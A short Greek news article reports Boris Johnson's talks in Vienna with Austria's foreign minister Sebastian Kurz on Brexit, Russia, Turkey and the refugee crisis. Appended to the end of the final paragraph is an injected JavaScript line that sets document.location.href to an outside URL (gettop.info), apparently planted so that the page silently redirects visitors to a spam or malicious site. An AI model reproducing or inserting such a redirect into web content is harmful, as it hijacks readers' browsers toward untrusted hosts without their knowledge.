Μπόρις Τζόνσον: Δεν εγκαταλείπουμε την Ευρώπη, αλλά την Ευρωπαϊκή Ενωση

0
3

«Δεν εγκαταλείπουμε την Ευρώπη, αλλά την Ευρωπαϊκή Ενωση», επισήμανε ο Βρετανός υπουργός Εξωτερικών Μπόρις Τζόνσον, μετά τις συνομιλίες που είχε στη Βιέννη με τον Αυστριακό ομόλογό του Σεμπάστιαν Κουρτς, τονίζοντας ταυτόχρονα την πρόθεση της χώρας του για περαιτέρω συνεργασία με τα κράτη-μέλη της ΕΕ.

Σε κοινή συνέντευξη Τύπου ο Βρετανός υπουργός Εξωτερικών ανέφερε πως συζήτησαν για τη Ρωσία, την Τουρκία και την προσφυγική κρίση, θέματα για τα οποία, όπως σημείωσε, το Λονδίνο ενδιαφέρεται να αντιμετωπίζονται από κοινού, ανεξάρτητα από το ποια θα είναι μελλοντικά η σχέση του με την ΕΕ, την οποία θέλει να είναι ισχυρή, όπως θέλει επίσης ένα «ισχυρό Ηνωμένο Βασίλειο».

Από την πλευρά του, ο Αυστριακός υπουργός Εξωτερικών ανέφερε πως κατά τις συνομιλίες με το Βρετανό ομόλογό του, «που υπήρξαν πολύ παραγωγικές και πολύ ενδιαφέρουσες» , συζητήθηκαν επίσης τόσο οι διμερείς σχέσεις όσο και τα επόμενα βήματα ενόψει της σχεδιαζόμενης εξόδου της Βρετανίας από την ΕΕ, καθώς, όπως τόνισε, στόχος πρέπει να είναι η συνέχιση στενών σχέσεων ανάμεσα στη Βρετανία και την ΕΕ, όπως και μεταξύ των δύο χωρών τους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here